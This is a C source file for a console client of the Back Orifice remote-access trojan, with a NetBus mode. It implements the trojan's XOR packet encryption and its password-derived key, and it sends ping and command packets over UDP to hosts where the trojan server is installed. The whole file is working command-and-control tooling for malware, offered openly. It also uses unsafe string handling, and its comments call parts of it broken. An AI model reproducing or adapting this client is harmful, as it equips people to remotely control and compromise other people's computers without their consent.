/* boclient.c - Console client for Back Orifice */

#include "bounix.h"

/* GLOBALS */

unsigned long g_packet;
static long holdrand = 1L;
char g_password[ARGSIZE];
char g_lastdata[BUFFSIZE];
in_addr_t g_lastpongip;
in_port_t g_lastpongport;
in_addr_t host;
int udpsock;
char cwd[MAX_PATH];
in_port_t port = PORT;


extern struct sockaddr_in nbremote;
extern int nbconnected;

/*                    CRYPTING FUNCTIONS 
 *                    (ISS x-force has xor teknique 
 */

void msrand(unsigned int seed)
{
	holdrand = (long) seed;
}

int mrand(void)
{
	return (((holdrand = holdrand * 214013L + 2531011L) >> 16) & 0x7fff);
}


unsigned int getkey()
{
	int x, y;
	unsigned int z;

	y = strlen(g_password);
	if (!y)
		return 31337;
	else {
		z = 0;
		for (x = 0; x < y; x++)
			z += g_password[x];

		for (x = 0; x < y; x++) {
			if (x % 2)
				z -= g_password[x] * (y - x + 1);
			else
				z += g_password[x] * (y - x + 1);
			z = z % RAND_MAX;
		}
		z = (z * y) % RAND_MAX;
		return z;
	}
}

void BOcrypt(unsigned char *buff, int len)
{
	int y;

	if (!len)
		return;

	msrand(getkey());
	for (y = 0; y < len; y++)
		buff[y] = buff[y] ^ (mrand() % 256);
}

/*
 *                       I/O socket functions  
 */

int getpong(int sock)
{

/* loops through with select, returns 0 on correct ping response
   and 1 on a timeout or select error. */

	struct sockaddr_in host;
	char buff[BUFFSIZE];
	int hostsize, x, sel;
	u32bit *pdw;
	unsigned char *ptr;
	unsigned long packetsize;
	unsigned char type;
	fd_set fds;
	struct timeval tv;

	FD_ZERO(&fds);
	FD_SET(sock, &fds);
	tv.tv_sec = 10;
	tv.tv_usec = 0;
	hostsize = sizeof(host);

	while (1) {
		tv.tv_sec = 10;
		tv.tv_usec = 0;
		sel = select(sock + 1, &fds, NULL, NULL, &tv);
		if (sel < 0) {
			if (errno == EINTR)
				continue;
			else
				break;
		}
		if ((x = recvfrom(sock, buff, BUFFSIZE, 0, (struct sockaddr *) &host, &hostsize)) <= 0)
			return (1);

		BOcrypt(buff, x);

		if (strncmp(buff, MAGICSTRING, MAGICSTRINGLEN) != 0) {
			printf("------- Garbage packet recieved from %s port %d -------\n", inet_ntoa(host.sin_addr), (in_port_t) ntohs(host.sin_port));
			continue;
		}
		pdw = (u32bit *) buff;
		pdw += 2;
		packetsize = __EL_LONG(*pdw);
		pdw += 2;
		ptr = (unsigned char *) pdw;
		type = *ptr++;

		if (!(type & PARTIAL_PACKET) && !(type & CONTINUED_PACKET) &&
		    (type == TYPE_PING)) {
			printf("------- Pong received from %s port %d -------\n", inet_ntoa(host.sin_addr), (in_port_t) ntohs(host.sin_port));
			puts(ptr);
			puts("------- End of data -------");
			g_lastpongip = host.sin_addr.s_addr;
			g_lastpongport = (in_port_t) ntohs(host.sin_port);
			return (0);
		} else {
			printf("------- Non pong response from %s port %d -------\n", inet_ntoa(host.sin_addr), (in_port_t) ntohs(host.sin_port));
			puts(ptr);
			puts("------- End of data -------");
			continue;
		}
	}
	if (sel < 0)
		perror("select");

	return (1);
}


int getinput(int sock)
{
	struct sockaddr_in host;
	char buff[BUFFSIZE];
	int hostsize, x, sel;
	u32bit *pdw;
	unsigned char *ptr;
	unsigned long packetsize;
	unsigned long oldestpack, lastpacket, packetid;
	unsigned char type;
	struct timeval tv;
	fd_set fds;

	FD_ZERO(&fds);
	FD_SET(sock, &fds);
	tv.tv_sec = 10;
	tv.tv_usec = 0;
	hostsize = sizeof(host);

	while (1) {
		tv.tv_sec = 10;
		tv.tv_usec = 0;
		sel = select(sock + 1, &fds, NULL, NULL, &tv);
		if (sel < 0) {
			if (errno == EINTR)
				continue;
			else
				break;
		}
		if ((x = recvfrom(sock, buff, BUFFSIZE, 0, (struct sockaddr *) &host,
				  &hostsize)) <= 0)
			continue;	/* this still shouldnt happen */

		BOcrypt(buff, x);
		if (strncmp(buff, MAGICSTRING, MAGICSTRINGLEN) != 0)
			continue;	/* this packet isnt for us, pass off */

		pdw = (u32bit *) buff;	/* parse out the packet */
		pdw += 2;
		packetsize = *pdw++;
		packetsize = __EL_LONG(packetsize);
		packetid = *pdw++;
		packetid = __EL_LONG(packetid);
		ptr = (unsigned char *) pdw;
		type = *ptr++;

		/* this is a singular packet */
		if (!(type & PARTIAL_PACKET) && !(type & CONTINUED_PACKET)) {
			printf("------- Packet received from %s port %d -------\n",
			       inet_ntoa(host.sin_addr),
			       (in_port_t) ntohs(host.sin_port));
			puts(ptr);
			puts("------- End of data -------");
			return 0;	/* success */
		}
		/* first packet in a set of packets */
		if (!(type & CONTINUED_PACKET)) {
			oldestpack = packetid;
			printf("------- Packet received from %s port %d -------\n",
			       inet_ntoa(host.sin_addr),
			       (in_port_t) ntohs(host.sin_port));
		}
		if (type & CONTINUED_PACKET) {	/* if we're here, i believe this will always be true */
			/* if packetid = lastpacket+1 (normal), this doesnt run */

			/* This code is B00l Shit. It's borken big time.
			   for(p=lastpacket; packetid > lastpacket+1; p++)
			   printf("Packet #%d in this collection is MIA\n", (int)(p-oldestpack));
			 */
			lastpacket = packetid;
		}
		puts(ptr);

		/* last packet in a set of packets */
		if (!(type & PARTIAL_PACKET)) {
			puts("------- End of data -------");
			return 0;	/* success */
		}
	}

	/* determine why we broke out of the loop */
	if (sel == 0)
		puts("Timeout on wait, host may not be reachable, or no server installed\n");
	else if (sel < 0)
		perror("select");

	return (1);		/* error */
}


int sendping(in_addr_t dest, in_port_t port, int sock)
{
	unsigned char *ptr;
	u32bit *pdw;
	unsigned long size;
	struct sockaddr_in host;
	char buff[BUFFSIZE];
	int i;
	fd_set fdset;
	struct timeval tv;

	size = MAGICSTRINGLEN + (sizeof(u32bit) * 2) + 2;
	strcpy(buff, MAGICSTRING);
	pdw = (u32bit *) (buff + MAGICSTRINGLEN);
	*pdw++ = __EL_LONG(size);
	*pdw++ = __EL_LONG((u32bit) - 1);
	ptr = (unsigned char *) pdw;
	*ptr++ = TYPE_PING;
	*ptr = 0;

	BOcrypt(buff, (int) size);

	host.sin_family = AF_INET;
	host.sin_port = htons((u_short) port);
	host.sin_addr.s_addr = dest;

	FD_ZERO(&fdset);
	FD_SET(sock, &fdset);
	tv.tv_sec = 10;
	tv.tv_usec = 0;

	while (1) {
		i = select(sock + 1, NULL, &fdset, NULL, &tv);
		if (i == 0) {
			printf(" Timeout waiting to send to socket\n");
			return (1);
		} else if (i < 0) {
			if (errno == EINTR)
				continue;
			perror("select: ");
			return (1);
		}
		break;
	}
	if ((sendto(sock, buff, size, 0, (struct sockaddr *) &host, sizeof(host))) != size) {
		perror("sendto: ");
		return (1);
	}
	return 0;
}



int sendpacket(unsigned char type, const char *str1, const char *str2, in_addr_t dest, in_port_t port, int sock)
{
	unsigned char *ptr;
	u32bit *pdw;
	unsigned long size;
	struct sockaddr_in host;
	char buff[BUFFSIZE];

	if (dest == 0) {
		puts("Set a target host with the 'host' command.  (Type 'help' for assistance)");
		return 1;
	}
	/*               4    4   1    ?        ?      1 
	 * -----------------------------------------------
	 * |MAGICSTRING|size|pakt|t|arg1... |arg2... |crc|
	 * |           |    |num | |        |        |   |
	 * -----------------------------------------------
	 */
	size = MAGICSTRINGLEN + (sizeof(u32bit) * 2) + 3 + strlen(str1) + strlen(str2);
	strcpy(buff, MAGICSTRING);
	pdw = (u32bit *) (buff + MAGICSTRINGLEN);
	*pdw++ = __EL_LONG(size);
	*pdw++ = __EL_LONG(g_packet);
	g_packet++;
	ptr = (unsigned char *) pdw;
	*ptr++ = type;
	strcpy(ptr, str1);
	ptr += strlen(str1) + 1;
	strcpy(ptr, str2);

	BOcrypt(buff, (int) size);

	host.sin_family = AF_INET;
	host.sin_port = htons((u_short) port);
	host.sin_addr.s_addr = dest;

	if ((sendto(sock, buff, size, 0, (struct sockaddr *) &host, sizeof(host))) != size) {
		perror("sendto: ");
		return (1);
	}
	return 0;
}


/************************** MISC FUNCTIONS **************************/

void fixfilename(char *buff, const char *cwd, const char *path)
{
	if (path[0] == '\\') {
		strncpy(buff, cwd, 2);
		strncpy(buff + 3, path, strlen(path) + 1);
	} else if (strncmp(path + 1, ":\\", 2) == 0) {
		strcpy(buff, path);
	} else {
		sprintf(buff, "%s%s", cwd, path);
	}
}

char *
 quotedstring(char *dest, char *src)
{
	char *d, *s, c;
	int quote, escape;

	if (!dest || !src)
		return src;
	d = dest;
	s = src;
	quote = 0;
	escape = 0;
	do {
		c = *s++;
		if (quote == 0) {
			if (c == ' ') {
				*d++ = '\0';
				break;
			} else if (c == '"')
				quote = 1;
			else
				*d++ = c;
		} else {
			if (escape == 0) {
				if (c == '"')
					quote = 0;
				else if (c == '\\')
					escape = 1;
				else
					*d++ = c;
			} else {
				*d++ = c;
				escape = 0;
			}
		}
	}
	while (c != '\0');

	/* !!!A TERRIBLE KLUDGE!!! Should be fixed as soon as possible */
	if (s != src)
		s--;

	return s;
}


#ifdef WITH_READLINE
extern char **bo_complete(char *text, int start, int end);
extern char **nb_complete(char *text, int start, int end);
#endif


/**************************** MAIN ***************************/

int main(int argc, char **argv)
{
	struct sockaddr_in sockaddr;
	extern struct in_addr hostin;
	char *c, *ch, hostname[1024];
	char buff[BUFFSIZE];
	char command[COMMANDSIZE];
	char arg1[ARGSIZE], arg2[ARGSIZE];
	int x;
	in_port_t clientport = (in_port_t) - 1;
#ifdef HAVE_STRUCT_LINGER
	struct linger linger;
#endif

#ifdef WITH_READLINE
	rl_initialize();
#endif
	ch = NULL;
	host = 0;
	g_packet = 0;
	g_password[0] = 0;
	memset(cwd, 0, sizeof(cwd));
	strcpy(cwd, "c:\\");

	memset(hostname, 0, sizeof(hostname));
	memset(arg1, 0, sizeof(arg1));
	memset(arg2, 0, sizeof(arg2));

	if (argc > 1) {
		for (x = 1; x < argc; x++) {
			if (argv[x][0] == '-' || argv[x][0] == '/') {
				switch (toupper((int) argv[x][1])) {
				case 'H':
				case '?':
					fprintf(stdout, "usage: %s [-n] [-p port] [host]\n", argv[0]);
					return 0;
				case 'P':
					if (argv[x][2] == 0) {
						x++;
						if (!argv[x]) {
							fprintf(stderr, "%s: `-p' requires an argument!\n", argv[0]);
							return (EXIT_FAILURE);
						}
						ch = argv[x];
					} else
						ch = &argv[x][2];
					if (ch) {
						clientport = (in_port_t) atoi(ch);
						if ((int) clientport <= 0) {
							fprintf(stderr, "%s: invalid argument to `-p': %s\n", argv[0], ch);
							return (EXIT_FAILURE);
						}
					}
					break;
				case 'N':
					trojanmode = TROJAN_NB;
					break;
				case 0:
					puts("\"-\"?");
					break;
				default:
					printf("Unknown commandline option: '%c'\n", argv[x][1]);
					break;
				}
			} else
				strncpy(hostname, argv[x], sizeof(hostname));
		}
	}
	if ((udpsock = socket(AF_INET, SOCK_DGRAM, 0)) < 0) {
		perror("socket: ");
		return (1);
	}
	memset(&sockaddr, 0, sizeof(sockaddr));
	sockaddr.sin_family = AF_INET;
	sockaddr.sin_port = htons((u_short) clientport);

	if ((bind(udpsock, (struct sockaddr *) &sockaddr, sizeof(sockaddr))) < 0) {
		perror("bind: ");
		return (1);
	}
#ifdef HAVE_STRUCT_LINGER
	linger.l_onoff = 0;	/* dont linger */
	setsockopt(udpsock, SOL_SOCKET, SO_LINGER, (void *) &linger, sizeof(linger));
#endif
	printf("Back Orifice console client version %s\n", VERSION);
	printf(" (Type 'help' for assistance)\n");

	switch (trojanmode) {
	case TROJAN_BO:
		if (strlen(hostname) != 0) {
			switch (new_host(hostname, ch)) {
			case 0:
				printf("New host: %s:%d\n", inet_ntoa(hostin), port);
				break;
			case 1:
				printf("resolver said: eat me.\n");
				break;
			case 2:
				printf("resolver returned bogus IP address!\n");
				break;
			}
		}
		break;
	case TROJAN_NB:
		if (strlen(hostname) != 0) {
			if ((int) clientport < 0)
				clientport = (in_port_t) NB_PORT;
			if (init_netbus(hostname, clientport))
				printf("Cannot connect to %s:%d!\n", hostname, clientport);
		}
		break;
	}

#ifdef WITH_READLINE
	signal(SIGALRM, sig_alrm);
	alarm(ALARM);
#endif

	while (!feof(stdin)) {
		switch (trojanmode) {
		case TROJAN_BO:
#ifdef WITH_READLINE
			rl_attempted_completion_function = (CPPFunction *) (bo_complete);
#endif
			if (host == 0) {
				strcpy(buff, "BO> ");
			} else {
				sprintf(buff, "BO:%s> ", inet_ntoa(hostin));
			}
			break;

		case TROJAN_NB:
#ifdef WITH_READLINE
			rl_attempted_completion_function = (CPPFunction *) (nb_complete);
#endif
			if (nbconnected == 0) {
				strcpy(buff, "NB> ");
			} else {
				sprintf(buff, "NB:%s> ", inet_ntoa(nbremote.sin_addr));
			}
			break;
		}
#ifndef WITH_READLINE

		printf(buff);	/* print prompt */
		arg1[0] = arg2[0] = 0;
		memset(buff, 0, BUFFSIZE);
		fgets(buff, BUFFSIZE, stdin);
		if (buff[strlen(buff) - 1] == '\n')
			buff[strlen(buff) - 1] = '\0';	/* get rid of newline */

		c = quotedstring(command, buff);

#else

		c = quotedstring(command, rl_gets(buff));

#endif

		if (c)
			while (isspace((int) c[0]) && strlen(c) > 0)
				c++;
		/* advance to next nonspace character */

		c = quotedstring(arg1, c);

		if (c)
			while (isspace((int) c[0]))
				c++;
		/* advance to next nonspace character */

		c = quotedstring(arg2, c);

		if (!c)
			break;

		if (*command && executecommand(command, arg1, arg2))
			printf("Command Failed\n");
		/* parsing sucks, but we're done. lets go! */

	}

	return 0;
}
